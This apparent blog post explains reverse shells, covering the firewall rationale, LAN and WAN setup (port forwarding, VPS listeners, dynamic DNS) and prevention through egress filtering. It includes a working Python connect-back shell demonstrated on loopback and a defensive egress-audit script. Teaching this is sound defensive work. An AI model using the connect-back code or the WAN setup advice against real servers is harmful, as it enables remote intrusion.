What is a reverse shell?

ayt
5 min read, Mar 16, 2023

image by pixabay.com

Table of contents

  • What is a shell
  • What is a reverse shell
  • Why do attackers/hackers need a reverse shell
  • Difference between attacking over WAN and LAN
  • Preventing reverse shells

What is a shell?

First, we have to know what a shell is before moving on to the reverse shell. Is it a shell like the one on the back of a turtle? Not quite, but it got its name the same way: it is the outermost layer wrapped around the operating system. What does a shell do? A shell is a program that translates your commands into requests to the operating system, so it is the interface between the OS and the user. It takes input, the commands or keywords you type on the keyboard, and hands them to the OS, while the terminal/CLI (command line interface) is the window in which you type those commands and interact with the shell. Common shells are bash and sh on Linux and cmd.exe and PowerShell on Windows. There is a lot more to say about shells, but I won't go into it since this blog mainly focuses on the reverse shell.

What is a reverse shell?

I bet you have heard this term a lot in tutorial videos and CTFs without knowing what it means yet. This is the right place for you. The meaning of a reverse shell is in the name: it does the opposite of a normal remote connection. Normally the user is the client and connects to the server, and in an attack the server is usually the target. The server listens for connections from users on specific ports. For example, a web server listens on port 443 for incoming connections so that it can provide the service the user wants, which is a website. How does a reverse shell do it the other way around? In the reverse shell case the server initiates the connection, and the user, who here is the attacker, listens on the port the server will connect to. For instance, a reverse shell payload is injected into the web server. In that payload you will see the IP address of your laptop or PC and the port you want the server to connect to; let's say 192.168.1.1 and port 4444. Before you even inject the payload, you have to be listening on that port with a tool such as Netcat. Once the payload runs, the server connects to your device and you get a shell on the server over that connection: whatever you type into your listener is executed on the server, and the output comes back to you.
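To make the direction of the connection concrete, here is a minimal reverse-shell round trip written for this post (added example, not the author's code or a real payload). Both halves run on loopback in one process: the "attacker" side only listens, the way `nc -lvnp 4444` would, and the "victim" side makes the outbound TCP connection, reads one command, runs it and sends the output back. The attacker address and the single-command protocol are assumptions for the demo; a real payload keeps the shell attached to the socket until the attacker disconnects.

```python
"""Reverse-shell round trip on loopback: the victim connects *out* to the
attacker, the attacker only listens. Added example for illustration; it
handles a single command instead of an interactive /bin/sh so the whole
exchange can be shown end to end in one process."""
import socket
import subprocess
import threading


def attacker_listener(srv, command, results):
    """Attacker side (what `nc -lvnp <port>` does): accept the inbound
    connection, send one command line, collect output until EOF."""
    conn, _peer = srv.accept()
    with conn:
        conn.sendall(command.encode() + b"\n")
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:          # victim shut down its write side
                break
            chunks.append(data)
    results.append(b"".join(chunks).decode(errors="replace"))


def victim_connect_back(host, port):
    """Victim side: the compromised server opens an OUTBOUND connection to the
    attacker (this is the 'reverse' part), reads a command, runs it, and ships
    the output back over the same socket."""
    with socket.create_connection((host, port)) as s:
        reader = s.makefile("rb")
        command = reader.readline().decode().strip()
        # shell=True on purpose: this is exactly the attacker-controlled string
        # a real reverse shell would hand to /bin/sh.
        completed = subprocess.run(command, shell=True, capture_output=True, timeout=10)
        s.sendall(completed.stdout + completed.stderr)
        s.shutdown(socket.SHUT_WR)   # EOF tells the listener we are done


def reverse_shell_roundtrip(command, attacker_host="127.0.0.1"):
    """Run both halves on loopback and return what the attacker received."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((attacker_host, 0))     # port 0: let the OS pick a free port
    srv.listen(1)
    attacker_port = srv.getsockname()[1]
    results = []
    t = threading.Thread(target=attacker_listener, args=(srv, command, results))
    t.start()
    victim_connect_back(attacker_host, attacker_port)   # connection goes victim -> attacker
    t.join(timeout=10)
    srv.close()
    return results[0]


if __name__ == "__main__":
    print(reverse_shell_roundtrip("id; uname -a"))
```

Note which side calls `listen()` and which side calls `create_connection()`: that is the only thing "reverse" about a reverse shell. The victim's socket is an ordinary outbound client connection, which is why an inbound-only firewall never sees anything to block.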

Why do attackers need a reverse shell?

Why do attackers need them? Generally speaking, because of the firewall. The firewall limits the incoming traffic that the attacker can send to the server, but it usually does not limit the outgoing traffic the server sends to users (or attackers). Attacked servers usually accept inbound connections only on specific ports. For example, a dedicated web server will only accept connections on ports 80 and 443. This means the attacker cannot simply start a shell listener on the attacked server (a so-called bind shell) and connect to it on a new port, because the inbound firewall would block that connection.

On the other hand, firewalls often do not limit outgoing connections at all, and even when they do, they commonly still allow outbound traffic to well-known ports such as 80 and 443, which is why reverse shell payloads often use those as the destination port. Therefore, the attacker creates the connection in reverse: the attacker sets up the listener, the server acts like a client and connects out to the attacker, and the attacker then sends commands over that connection. All the attacker needs is a machine with an IP address the server can reach and a tool such as Netcat to create the listener and attach a shell to the incoming connection.

image by pixabay.com

Difference between attacking over WAN and LAN

Establishing a reverse shell over the LAN is pretty simple. You just need to know your private IP address and the victim's private IP address. Let's say you are in the 192.168.1.0/24 network, your IP address is 192.168.1.10, and the victim's IP address is 192.168.1.20. You start your listener on 192.168.1.10, inject a payload containing that IP and the port you want the victim to connect to, and the connection arrives directly, because both machines are on the same network with no NAT in between.

How about WAN? This is where it gets a little bit complicated. First you replace your private IP with your public IP, which you can find by searching on Google for "what is my public IP address". Are we done here? Not really, but we are one step closer. Let's say you have already found a way, or a vulnerability, to inject the reverse shell payload into the server. The victim server will try to connect to your public IP address because that is what you put in your payload. But your public IP belongs to your router, not to your machine, so the connection from the victim reaches your router before it reaches the listener on your machine. The router has to know which device on your home network to forward that connection to. That is done by enabling Port Forwarding on your router for the listener port, but you will have to google how to do it for your specific router, since there are many different models from various vendors. Keep in mind that some ISPs put customers behind their own NAT (carrier-grade NAT), in which case port forwarding on your router alone is not enough.

This attack takes less work if your public IP address is static, but that is not required and not common. The public IP your ISP assigns to your router may or may not be static; a dynamic IP address is what most home connections get. Dynamic means your public IP can change whenever you re-establish your connection to the internet (restarting the router, etc.). In that case the old IP written in the payload is of no use. There are still other ways to do it: the usual answer is to run the listener on a host that already has a stable public IP, such as a rented VPS, or to put a dynamic DNS hostname in the payload instead of a raw IP so the victim resolves your current address when it connects.

Here is a reverse shell cheat sheet for you all.

How to prevent it?

The best way to avoid reverse shells is to protect against the attacks that let impostors run commands on the server in the first place, such as command injection or insecure file upload in the web application. You can also remove or disable most tools that make it easy to create a reverse shell. As you can see from the cheat sheet above, reverse shells can be created with many different tools and languages (Netcat, Bash, Python, Perl, PHP and so on), so stripping unneeded interpreters and network utilities from a production server makes it harder for the attacker, but not impossible. The part most people skip is the outgoing side: the whole technique depends on the server being allowed to connect out, so an egress firewall that only lets the server reach the destinations it actually needs (its database, its update mirror) breaks the reverse connection, and monitoring the outbound connections made by the web server's processes will reveal one when it happens.
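As an added example of that last point (my code, not the author's, and not a real capture), here is a small egress audit for a web host. It parses connection lines in the shape of Linux `ss -Htnp` output, treats anything where the local port is one of the served ports (80/443) as an accepted inbound connection, and flags every other connection unless its destination is on an explicit allow list. The host addresses, the allow list and the five sample lines are all constructed for the demo. Note that the `python3` connection to port 443 is flagged too: a destination allow list catches a reverse shell that hides behind a "normal" port, which a port-only rule would wave through.

```python
"""Egress audit for a web host: flag outbound TCP connections that a web server
has no business making. Added example; the sample lines below are constructed
to look like `ss -Htnp state established`, they are not from a real system."""
import re
from dataclasses import dataclass

# Constructed sample. Columns: Recv-Q Send-Q Local:Port Peer:Port Process
SAMPLE_SS = """\
0 0 10.0.0.5:443 203.0.113.9:51234 users:(("nginx",pid=812,fd=12))
0 0 10.0.0.5:80 198.51.100.7:40002 users:(("nginx",pid=813,fd=9))
0 0 10.0.0.5:49802 10.0.0.20:5432 users:(("php-fpm",pid=1201,fd=7))
0 0 10.0.0.5:38211 192.0.2.77:4444 users:(("sh",pid=1377,fd=3))
0 0 10.0.0.5:38215 192.0.2.77:443 users:(("python3",pid=1380,fd=4))
"""

# Assumed policy for the demo host: it serves 80/443 and may talk to its database.
SERVICE_PORTS = {80, 443}
ALLOWED_EGRESS = {("10.0.0.20", 5432)}

LINE_RE = re.compile(
    r'^\S+\s+\S+\s+(?P<local>\S+)\s+(?P<peer>\S+)\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)


@dataclass(frozen=True)
class Conn:
    local_ip: str
    local_port: int
    peer_ip: str
    peer_port: int
    process: str
    pid: int


def split_addr(addr):
    """'10.0.0.5:443' -> ('10.0.0.5', 443); also strips IPv6 brackets."""
    ip, port = addr.rsplit(":", 1)
    return ip.strip("[]"), int(port)


def parse_ss(text):
    """Parse ss-style lines into Conn records, skipping anything unparseable."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        lip, lport = split_addr(m["local"])
        pip, pport = split_addr(m["peer"])
        conns.append(Conn(lip, lport, pip, pport, m["proc"], int(m["pid"])))
    return conns


def is_inbound(conn):
    """A connection whose local port is a served port was accepted, not initiated."""
    return conn.local_port in SERVICE_PORTS


def find_suspicious_egress(text):
    """Return outbound connections whose destination is not on the allow list."""
    return [
        c for c in parse_ss(text)
        if not is_inbound(c) and (c.peer_ip, c.peer_port) not in ALLOWED_EGRESS
    ]


if __name__ == "__main__":
    for c in find_suspicious_egress(SAMPLE_SS):
        print(f"suspicious egress: {c.process}[{c.pid}] -> {c.peer_ip}:{c.peer_port}")
```

This is the detection side; the enforcing counterpart is an outbound firewall policy on the host or network edge built from the same allow list, so that the `sh` and `python3` connections above are refused rather than merely reported.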

My Twitter: https://twitter.com/Ayt06153394

Reference

Wikipedia contributors. (2022, October 18). Shellcode. Wikipedia. https://en.wikipedia.org/wiki/Shellcode

Nidecki. (2019, August 26). What Is a Reverse Shell. Acunetix. https://www.acunetix.com/blog/web-security-zone/what-is-reverse-shell/

GeeksforGeeks. (2022, September 27). Difference Between Bind Shell and Reverse Shell. https://www.geeksforgeeks.org/difference-between-bind-shell-and-reverse-shell/

ayt

17-year-old || Write about life lessons, tech stuff, business, academic, self-improvement |||